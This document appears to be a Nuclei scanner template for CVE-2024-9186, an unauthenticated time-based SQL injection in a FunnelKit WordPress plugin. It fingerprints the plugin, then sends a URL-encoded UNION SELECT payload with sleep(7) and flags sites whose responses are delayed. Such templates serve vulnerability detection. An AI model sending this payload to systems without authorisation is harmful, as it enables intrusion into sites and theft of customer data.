id: CVE-2024-9186

info:
  name: Automation By Autonami < 3.3.0 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit WordPress plugin before 3.3.0 does not sanitize and escape the bwfan-track-id parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks.
  impact: |
    Unauthenticated attackers can exploit time-based SQL injection through the bwfan-track-id parameter to extract sensitive database information including user credentials, email addresses, WooCommerce customer data, and marketing automation information.
  remediation: |
    Fixed in 3.3.0
  reference:
    - https://wpscan.com/vulnerability/fab29b59-7e87-4289-88dd-ed5520260c26/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9186
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-89
    cve-id: CVE-2024-9186
    epss-score: 0.02241
    epss-percentile: 0.80633
  metadata:
    verified: true
    max-request: 2
    vendor: funnelkit
    product: wp-marketing-automations
    framework: wordpress
    fofa-query: body="wp-content/plugins/wp-marketing-automations/"
  tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,wp-marketing-automations,time-based-sqli,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/wp-marketing-automations")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /?bwfan-track-id=test%27%20UNION%20SELECT%201%2C1%2C%27%27%2CNOW()%2CNOW()%2C1%2C%27%27%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%27%27%2CNOW()%2C%27%27%2CNOW()%2C1%2C1%2Csleep(7)%23&bwfan-track-action=click HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "status_code == 200"
        condition: and
# digest: 4b0a0048304602210099cd7c2ef53e12eabdca5b6c9622bdbe52aac07732121f13a4b3af47d670b7490221008b0373c7c67252c2e5e10005e155315baaa4942946d8d97182f68652403c86c9:922c64590222798bb761d5b6d8e72950